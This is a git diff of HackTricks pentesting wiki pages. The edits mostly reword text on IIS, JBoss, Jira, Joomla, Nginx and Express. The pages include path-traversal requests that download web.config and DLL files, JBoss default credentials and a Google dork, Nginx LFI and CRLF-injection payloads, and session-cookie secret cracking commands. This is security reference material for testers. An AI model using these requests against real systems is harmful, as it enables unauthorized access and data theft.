-  <add name="DefaultConnection" connectionString="Data Source=(LocalDb)\MSSQLLocalDB;AttachDbFilename [...]" providerName="System.Data.SqlClient" />
-</connectionStrings>
-```
+### **Namespaces and Web.Config**
 
-**Namespaces**
-
-In addition, .Net MVC applications are structured to define **other web.config files**, having the aim to include any declaration for specific namespaces for each set of viewpages, relieving developers to declare “@using” namespaces in every file.
+MVC applications also define additional **web.config files** for specific namespaces to avoid repetitive declarations in each file, as demonstrated with a request to download another **web.config**:
 
 ```markup
 GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
 Host: example-mvc-application.minded
-[...]
-
-HTTP/1.1 200 OK
-[...]
-<?xml version="1.0"?>
-<configuration>
-  <configSections>
-    <sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
-    <section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
-    <section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
-    </sectionGroup>
-  </configSections>
-<system.web.webPages.razor><host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" /><pages pageBaseType="System.Web.Mvc.WebViewPage">
-  <namespaces>
-    <add namespace="System.Web.Mvc" />
-    <add namespace="System.Web.Mvc.Ajax" />
-    <add namespace="System.Web.Mvc.Html" />
-    <add namespace="System.Web.Optimization"/>
-    <add namespace="System.Web.Routing" />
-    <add namespace="WebApplication1" />
 ```
 
-**Downloading DLLs**
+### **Downloading DLLs**
 
-From a very previous response, the declaration of a **custom namespace** (since other namespaces are defaults) suggests that a DLL called "**WebApplication1**" is present in the /bin directory.
-
-```
-GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
-Host: example-mvc-application.minded
-[...]
-```
-
-From the previous output, inside the /bin directory you will also be able to find the Dlls
-
-* System.Web.Mvc.dll
-* System.Web.Mvc.Ajax.dll
-* System.Web.Mvc.Html.dll
-* System.Web.Optimization.dll
-* System.Web.Routing.dll
-
-Let's suppose that the previous DLL is importing a namespace called **WebApplication1.Areas.Minded.** an attacker can infer that other web.config files are present in the application, in guessable/default paths as **/area-name/Views/**, containing specific configurations that may refer to other DLL files present in the /bin folder.
+The mention of a custom namespace hints at a DLL named "**WebApplication1**" present in the /bin directory. Following this, a request to download the **WebApplication1.dll** is shown:
 
 ```markup
-GET /download_page?id=..%2f..%2fMinded/Views/web.config HTTP/1.1
+GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
 Host: example-mvc-application.minded
-[...]
-
-HTTP/1.1 200 OK
-[...]
-<?xml version="1.0"?>
-<configuration>
-<configSections>
-  <sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
-    <section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
-    <section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral” requirePermission="false" />
-  </sectionGroup>
-</configSections>
-<system.web.webPages.razor><host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" />
-<pages pageBaseType="System.Web.Mvc.WebViewPage">
-<namespaces>
-  <add namespace="System.Web.Mvc" />
-  <add namespace="System.Web.Mvc.Ajax" />
-  <add namespace="System.Web.Mvc.Html" />
-  <add namespace="System.Web.Routing" />
-  <add namespace="System.Web.Optimization" />
-  <add namespace="WebApplication1" />
-  <add namespace="WebApplication1.AdditionalFeatures" />
-</namespaces>
 ```
 
-Note how in the previous output you can see a new namespace called: **WebApplication1.AdditionalFeatures** which indicates that there is another Dll in the /bin folder called **WebApplication1.AdditionalFeatures.dll**
+This suggests the presence of other essential DLLs, like **System.Web.Mvc.dll** and **System.Web.Optimization.dll**, in the /bin directory.
+
+In a scenario where a DLL imports a namespace called **WebApplication1.Areas.Minded**, an attacker might infer the existence of other web.config files in predictable paths, such as **/area-name/Views/**, containing specific configurations and references to other DLLs in the /bin folder. For example, a request to **/Minded/Views/web.config** can reveal configurations and namespaces that indicate the presence of another DLL, **WebApplication1.AdditionalFeatures.dll**.
 
 ### Common files
 
@@ -386,7 +263,7 @@ This attacked worked in this [**writeup**](https://infosecwriteups.com/how-i-hac
 
 ## IIS Authentication Bypass with cached passwords (CVE-2022-30209) <a href="#3-iis-authentication-bypass" id="3-iis-authentication-bypass"></a>
 
-A bug in the code **didn't properly check for the password given by the user**, so an attacker whose **password hash hits a key** that is already in the **cache** will be able to login as that user ([full report here](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html)).
+[Full report here](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): A bug in the code **didn't properly check for the password given by the user**, so an attacker whose **password hash hits a key** that is already in the **cache** will be able to login as that user .
 
 ```python
 # script for sanity check
diff --git a/network-services-pentesting/pentesting-web/imagemagick-security.md b/network-services-pentesting/pentesting-web/imagemagick-security.md
index 83817c453..16ddfcaf7 100644
--- a/network-services-pentesting/pentesting-web/imagemagick-security.md
+++ b/network-services-pentesting/pentesting-web/imagemagick-security.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-**Check further details in [https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html**](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html)**
+Check further details in [**https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html**](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html)
 
 ImageMagick, a versatile image processing library, presents a challenge in configuring its security policy due to its extensive options and lack of detailed online documentation. Users often create policies based on fragmented internet sources, leading to potential misconfigurations. The library supports a vast array of over 100 image formats, each contributing to its complexity and vulnerability profile, as demonstrated by historical security incidents.
 
@@ -49,7 +49,7 @@ A restrictive policy template has been proposed, focusing on stringent resource
 
 The effectiveness of a security policy can be confirmed using the `identify -list policy` command in ImageMagick. Additionally, the [evaluator tool](https://imagemagick-secevaluator.doyensec.com/) mentioned earlier can be used to refine the policy based on individual needs.
 
-# References
+## References
 * [https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html**](https://blog.doyensec.com/2023/01/10/imagemagick-security-policy-evaluator.html)
 
 
diff --git a/network-services-pentesting/pentesting-web/jboss.md b/network-services-pentesting/pentesting-web/jboss.md
index 28c1bf961..2d5bc4a44 100644
--- a/network-services-pentesting/pentesting-web/jboss.md
+++ b/network-services-pentesting/pentesting-web/jboss.md
@@ -20,27 +20,22 @@ If you are interested in **hacking career** and hack the unhackable - **we are h
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
-## Enumeration
+## Enumeration and Exploitation Techniques
 
-The _/web-console/ServerInfo.jsp_ and _/status?full=true_ web pages often reveal **server details**.
+When assessing the security of web applications, certain paths like _/web-console/ServerInfo.jsp_ and _/status?full=true_ are key for revealing **server details**. For JBoss servers, paths such as _/admin-console_, _/jmx-console_, _/management_, and _/web-console_ can be crucial. These paths might allow access to **management servlets** with default credentials often set to **admin/admin**. This access facilitates interaction with MBeans through specific servlets:
 
-You can expose **management servlets** via the following paths within JBoss (depending on the version): _/admin-console_, _/jmx-console_, _/management_, and _/web-console_. Default credentials are **admin**/**admin**. Upon gaining access, you can use available invoker servlets to interact with exposed MBeans:
+- For JBoss versions 6 and 7, **/web-console/Invoker** is used.
+- In JBoss 5 and earlier versions, **/invoker/JMXInvokerServlet** and **/invoker/EJBInvokerServlet** are available.
 
-* /web-console/Invoker (JBoss versions 6 and 7)
-* /invoker/JMXInvokerServlet and /invoker/EJBInvokerServlet (JBoss 5 and prior)
+Tools like **clusterd**, available at [https://github.com/hatRiot/clusterd](https://github.com/hatRiot/clusterd), and the Metasploit module `auxiliary/scanner/http/jboss_vulnscan` can be used for enumeration and potential exploitation of vulnerabilities in JBOSS services.
 
-**You can enumerate and even exploit a JBOSS service using** [**clusterd**](https://github.com/hatRiot/clusterd)\
-**Or using metasploit:** `msf > use auxiliary/scanner/http/jboss_vulnscan`
+### Exploitation Resources
 
-### Exploitation
+To exploit vulnerabilities, resources such as [JexBoss](https://github.com/joaomatosf/jexboss) provide valuable tools.
 
-[https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
+### Finding Vulnerable Targets
 
-### Google Dork
-
-```
-inurl:status EJInvokerServlet
-```
+Google Dorking can aid in identifying vulnerable servers with a query like: `inurl:status EJInvokerServlet`
 
 <img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
diff --git a/network-services-pentesting/pentesting-web/jira.md b/network-services-pentesting/pentesting-web/jira.md
index 24e85fa5f..4dfce791e 100644
--- a/network-services-pentesting/pentesting-web/jira.md
+++ b/network-services-pentesting/pentesting-web/jira.md
@@ -17,12 +17,10 @@ Other ways to support HackTricks:
 
 ## Check Privileges
 
-Inside a Jira instance **any user** (even **non-authenticated**) can **check its privileges** in `/rest/api/2/mypermissions` or `/rest/api/3/mypermissions` . These endpoints will return your current privileges.\
-If a **non-authenticated** user have any **privilege**, this is a **vulnerability** (bounty?).\
-If an **authenticated** user have any **unexpected privilege**, this a a **vuln**.
+In Jira, **privileges can be checked** by any user, authenticated or not, through the endpoints `/rest/api/2/mypermissions` or `/rest/api/3/mypermissions`. These endpoints reveal the user's current privileges. A notable concern arises when **non-authenticated users hold privileges**, indicating a **security vulnerability** that could potentially be eligible for a **bounty**. Similarly, **unexpected privileges for authenticated users** also highlight a **vulnerability**.
+
+An important **update** was made on **1st February 2019**, requiring the 'mypermissions' endpoint to include a **'permission' parameter**. This requirement aims to **enhance security** by specifying the privileges being queried: [check it here](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter)
 
-Update: As of 1st February 2019, - the 'mypermissions' endpoint requires a 'permission' parameter with one of the following parameters
-[https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter)
 - ADD_COMMENTS
 - ADMINISTER
 - ADMINISTER_PROJECTS
diff --git a/network-services-pentesting/pentesting-web/joomla.md b/network-services-pentesting/pentesting-web/joomla.md
index 503e1c313..add015a6e 100644
--- a/network-services-pentesting/pentesting-web/joomla.md
+++ b/network-services-pentesting/pentesting-web/joomla.md
@@ -7,7 +7,7 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
@@ -80,7 +80,7 @@ curl https://www.joomla.org/ | grep Joomla | grep generator
 
 ### Version
 
-* In **/administrator/manifests/files/joomla.xml **_**** you can see the version._
+* In **/administrator/manifests/files/joomla.xml** you can see the version.
 * In **/language/en-GB/en-GB.xml** you can get the version of Joomla.
 * In **plugins/system/cache/cache.xml** you can see an approximate version.
 
@@ -120,7 +120,7 @@ If you managed to get **admin credentials** you can **RCE inside of it** by addi
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
diff --git a/network-services-pentesting/pentesting-web/jsp.md b/network-services-pentesting/pentesting-web/jsp.md
index 2474c1641..fe3cfabc4 100644
--- a/network-services-pentesting/pentesting-web/jsp.md
+++ b/network-services-pentesting/pentesting-web/jsp.md
@@ -27,8 +27,6 @@ Accessing that web you may change all the links to request the information to _*
 
 ![](<../../.gitbook/assets/image (260).png>)
 
-\
-
 
 <details>
 
diff --git a/network-services-pentesting/pentesting-web/laravel.md b/network-services-pentesting/pentesting-web/laravel.md
index 11e43f4f4..d4fe4842c 100644
--- a/network-services-pentesting/pentesting-web/laravel.md
+++ b/network-services-pentesting/pentesting-web/laravel.md
@@ -7,7 +7,7 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
@@ -116,7 +116,7 @@ Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
diff --git a/network-services-pentesting/pentesting-web/nginx.md b/network-services-pentesting/pentesting-web/nginx.md
index 88c5214c0..cbbd74b6b 100644
--- a/network-services-pentesting/pentesting-web/nginx.md
+++ b/network-services-pentesting/pentesting-web/nginx.md
@@ -22,7 +22,11 @@ Other ways to support HackTricks:
 
 ## Missing root location <a href="#missing-root-location" id="missing-root-location"></a>
 
-```
+## **Essentials of Configuring Nginx Root Directory**
+
+When configuring the Nginx server, the **root directive** plays a critical role by defining the base directory from which files are served. Consider the example below:
+
+```bash
 server {
         root /etc/nginx;
 
@@ -33,13 +37,13 @@ server {
 }
 ```
 
-The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`.
+In this configuration, `/etc/nginx` is designated as the root directory. This setup allows access to files within the specified root directory, such as `/hello.txt`. However, it's crucial to note that only a specific location (`/hello.txt`) is defined. There's no configuration for the root location (`location / {...}`). This omission means that the root directive applies globally, enabling requests to the root path `/` to access files under `/etc/nginx`.
 
-A request as simple as `GET /nginx.conf` would reveal the contents of the Nginx configuration file stored in `/etc/nginx/nginx.conf`. If the root is set to `/etc`, a `GET` request to `/nginx/nginx.conf` would reveal the configuration file. In some cases it is possible to reach other configuration files, access-logs and even encrypted credentials for HTTP basic authentication.
+A critical security consideration arises from this configuration. A simple `GET` request, like `GET /nginx.conf`, could expose sensitive information by serving the Nginx configuration file located at `/etc/nginx/nginx.conf`. Setting the root to a less sensitive directory, like `/etc`, could mitigate this risk, yet it still may allow unintended access to other critical files, including other configuration files, access logs, and even encrypted credentials used for HTTP basic authentication.
 
 ## Alias LFI Misconfiguration <a href="#alias-lfi-misconfiguration" id="alias-lfi-misconfiguration"></a>
 
-Inside the Nginx configuration look the "location" statements, if someone looks like:
+In the configuration files of Nginx, a close inspection is warranted for the "location" directives. A vulnerability known as Local File Inclusion (LFI) can be inadvertently introduced through a configuration that resembles the following:
 
 ```
 location /imgs { 
@@ -47,19 +51,9 @@ location /imgs {
 }
 ```
 
-There is a LFI vulnerability because:
+This configuration is prone to LFI attacks due to the server interpreting requests like `/imgs../flag.txt` as an attempt to access files outside the intended directory, effectively resolving to `/path/images/../flag.txt`. This flaw allows attackers to retrieve files from the server's filesystem that should not be accessible via the web.
 
-```
-/imgs../flag.txt
-```
-
-Transforms to:
-
-```
-/path/images/../flag.txt
-```
-
-The correct configuration will be:
+To mitigate this vulnerability, the configuration should be adjusted to:
 
 ```
 location /imgs/ { 
@@ -67,8 +61,6 @@ location /imgs/ {
 }
 ```
 
-**So, if you find some Nginx server you should check for this vulnerability. Also, you can discover it if you find that the files/directories brute force is behaving weird.**
-
 More info: [https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/)
 
 Accunetix tests:
@@ -101,7 +93,7 @@ location = /admin/ {
 
 ## Unsafe variable use <a href="#unsafe-variable-use" id="unsafe-variable-use"></a>
 
-An example of a vulnerable Nginx configuration is:
+A vulnerability in Nginx configuration is demonstrated by the example below:
 
 ```
 location / {
@@ -109,7 +101,7 @@ location / {
 }
 ```
 
-The new line characters for HTTP requests are \r (Carriage Return) and \n (Line Feed). URL-encoding the new line characters results in the following representation of the characters `%0d%0a`. When these characters are included in a request like `http://localhost/%0d%0aDetectify:%20clrf` to a server with the misconfiguration, the server will respond with a new header named `Detectify` since the $uri variable contains the URL-decoded new line characters.
+The characters \r (Carriage Return) and \n (Line Feed) signify new line characters in HTTP requests, and their URL-encoded forms are represented as `%0d%0a`. Including these characters in a request (e.g., `http://localhost/%0d%0aDetectify:%20clrf`) to a misconfigured server results in the server issuing a new header named `Detectify`. This happens because the $uri variable decodes the URL-encoded new line characters, leading to an unexpected header in the response:
 
 ```
 HTTP/1.1 302 Moved Temporarily
@@ -125,128 +117,89 @@ Learn more about the risks of CRLF injection and response splitting at [https://
 
 ### Any variable
 
-In some cases, user-supplied data can be treated as an Nginx variable. It’s unclear why this may be happening, but it’s not that uncommon or easy to test for as seen in this [H1 report](https://hackerone.com/reports/370094). If we search for the error message, we can see that it is found in the [SSI filter module](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx\_http\_ssi\_filter\_module.c#L365), thus revealing that this is due to SSI.
+It was discovered that **user-supplied data** might be treated as an **Nginx variable** under certain circumstances. The cause of this behavior remains somewhat elusive, yet it's not rare nor straightforward to verify. This anomaly was highlighted in a security report on HackerOne, which can be viewed [here](https://hackerone.com/reports/370094). Further investigation into the error message led to the identification of its occurrence within the [SSI filter module of Nginx's codebase](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx_http_ssi_filter_module.c#L365), pinpointing Server Side Includes (SSI) as the root cause.
 
-One way to test for this is to set a referer header value:
+To **detect this misconfiguration**, the following command can be executed, which involves setting a referer header to test for variable printing:
 
-```
+```bash
 $ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar’
 ```
 
-We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched.
+Scans for this misconfiguration across systems revealed multiple instances where Nginx variables could be printed by a user. However, a decrease in the number of vulnerable instances suggests that efforts to patch this issue have been somewhat successful.
 
 ## Raw backend response reading
 
-With Nginx’s `proxy_pass`, there’s the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that it’s an HTTP response?
 
-If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx won’t understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this:
+Nginx offers a feature through `proxy_pass` that allows for the interception of errors and HTTP headers produced by the backend, aiming to hide internal error messages and headers. This is accomplished by Nginx serving custom error pages in response to backend errors. However, challenges arise when Nginx encounters an invalid HTTP request. Such a request gets forwarded to the backend as received, and the backend's raw response is then directly sent to the client without Nginx's intervention.
+
+Consider an example scenario involving a uWSGI application:
 
 ```python
 def application(environ, start_response):
-   start_response('500 Error', [('Content-Type',
-'text/html'),('Secret-Header','secret-info')])
-   return [b"Secret info, should not be visible!"]
+    start_response('500 Error', [('Content-Type', 'text/html'), ('Secret-Header', 'secret-info')])
+    return [b"Secret info, should not be visible!"]
 ```
 
-And with the following directives in Nginx:
+To manage this, specific directives in the Nginx configuration are used:
 
 ```
 http {
-   error_page 500 /html/error.html;
-   proxy_intercept_errors on;
-   proxy_hide_header Secret-Header;
+    error_page 500 /html/error.html;
+    proxy_intercept_errors on;
+    proxy_hide_header Secret-Header;
 }
 ```
 
-[proxy\_intercept\_errors](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors) will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a `500 Error` which would be intercepted by Nginx.
+- **[proxy_intercept_errors](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_intercept_errors)**: This directive enables Nginx to serve a custom response for backend responses with a status code greater than 300. It ensures that, for our example uWSGI application, a `500 Error` response is intercepted and handled by Nginx.
+- **[proxy_hide_header](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_hide_header)**: As the name suggests, this directive hides specified HTTP headers from the client, enhancing privacy and security.
 
-[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client.
+When a valid `GET` request is made, Nginx processes it normally, returning a standard error response without revealing any secret headers. However, an invalid HTTP request bypasses this mechanism, resulting in the exposure of raw backend responses, including secret headers and error messages.
 
-If we send a normal `GET` request, Nginx will return:
-
-```
-HTTP/1.1 500 Internal Server Error
-Server: nginx/1.10.3
-Content-Type: text/html
-Content-Length: 34
-Connection: close
-```
-
-But if we send an invalid HTTP request, such as:
-
-```
-GET /? XTTP/1.1
-Host: 127.0.0.1
-Connection: close
-```
-
-We will get the following response:
-
-```
-XTTP/1.1 500 Error
-Content-Type: text/html
-Secret-Header: secret-info
-
-Secret info, should not be visible!
-```
 
 ## merge\_slashes set to off
 
-The [merge\_slashes](http://nginx.org/en/docs/http/ngx\_http\_core\_module.html#merge\_slashes) directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so `///` would become `/`. If Nginx is used as a reverse-proxy and the application that’s being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it. This is described in detail by [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d).
+By default, Nginx's **`merge_slashes` directive** is set to **`on`**, which compresses multiple forward slashes in a URL into a single slash. This feature, while streamlining URL processing, can inadvertently conceal vulnerabilities in applications behind Nginx, particularly those prone to local file inclusion (LFI) attacks. Security experts **Danny Robinson and Rotem Bar** have highlighted the potential risks associated with this default behavior, especially when Nginx acts as a reverse-proxy.
 
-We found 33 Nginx configuration files with `merge_slashes` set to “off”.
+To mitigate such risks, it is recommended to **turn the `merge_slashes` directive off** for applications susceptible to these vulnerabilities. This ensures that Nginx forwards requests to the application without altering the URL structure, thereby not masking any underlying security issues.
 
-## default is not specified for map directive
+For more information check [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d).
 
-It looks like common case when **`map` is used for some kind of authorization control**. Simplified example could look like:
+### **Default Value in Map Directive**
 
-```
+In the **Nginx configuration**, the `map` directive often plays a role in **authorization control**. A common mistake is not specifying a **default** value, which could lead to unauthorized access. For instance:
+
+```yaml
 http {
-...
     map $uri $mappocallow {
         /map-poc/private 0;
         /map-poc/secret 0;
         /map-poc/public 1;
     }
-...
 }
 ```
 
-```
+```yaml
 server {
-...
     location /map-poc {
         if ($mappocallow = 0) {return 403;}
         return 200 "Hello. It is private area: $mappocallow";
     }
-...
 }
 ```
 
-[According to the manual](https://nginx.org/en/docs/http/ngx\_http\_map\_module.html):
+Without a `default`, a **malicious user** can bypass security by accessing an **undefined URI** within `/map-poc`. [The Nginx manual](https://nginx.org/en/docs/http/ngx_http_map_module.html) advises setting a **default value** to avoid such issues.
 
-> default value\
-> sets the resulting value if the source value matches none of the specified variants. When default is not specified, the default\
-> resulting value will be an empty string.
+### **DNS Spoofing Vulnerability**
 
-It is easy to forget about `default` value. So **malefactor can bypass this "authorization control"** simply accessing a **non existent case inside `/map-poc`** like `https://targethost.com/map-poc/another-private-area`.
+DNS spoofing against Nginx is feasible under certain conditions. If an attacker knows the **DNS server** used by Nginx and can intercept its DNS queries, they can spoof DNS records. This method, however, is ineffective if Nginx is configured to use **localhost (127.0.0.1)** for DNS resolution. Nginx allows specifying a DNS server as follows:
 
-## DNS Spoofing Nginx
-
-According to this post: [http://blog.zorinaq.com/nginx-resol**ver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/) **It might be possible to spoof DNS records** to Nginx if you **know the DNS server Nginx** is using (and you can intercept somehow the communication, so this is **not valid if 127.0.0.1** is used) and the **domain it's asking**.
-
-Nginx can specify a DNS server to use with:
-
-```
-resolver     8.8.8.8;
+```yaml
+resolver 8.8.8.8;
 ```
 
-## `proxy_pass` and `internal` directives
+### **`proxy_pass` and `internal` Directives**
 
-The **`proxy_pass`** directive can be used to **redirect internally requests to other servers** internal or external.\
-The **`internal`** directive is used to make it clear to Nginx that the **location can only be accessed internally**.
-
-The use of these directives **isn't a vulnerability but you should check how are them configured**.
+The **`proxy_pass`** directive is utilized for redirecting requests to other servers, either internally or externally. The **`internal`** directive ensures that certain locations are only accessible within Nginx. While these directives are not vulnerabilities by themselves, their configuration requires careful examination to prevent security lapses.
 
 ## proxy\_set\_header Upgrade & Connection
 
diff --git a/network-services-pentesting/pentesting-web/nodejs-express.md b/network-services-pentesting/pentesting-web/nodejs-express.md
index 024515b2d..96d0b27e6 100644
--- a/network-services-pentesting/pentesting-web/nodejs-express.md
+++ b/network-services-pentesting/pentesting-web/nodejs-express.md
@@ -6,32 +6,32 @@ The tool [https://github.com/DigitalInterruption/cookie-monster](https://github.
 
 ### Single cookie with a specific name
 
-```
-$ cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session
+```bash
+cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session
 ```
 
 ### Custom wordlist
 
-```
-$ cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst
+```bash
+cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst
 ```
 
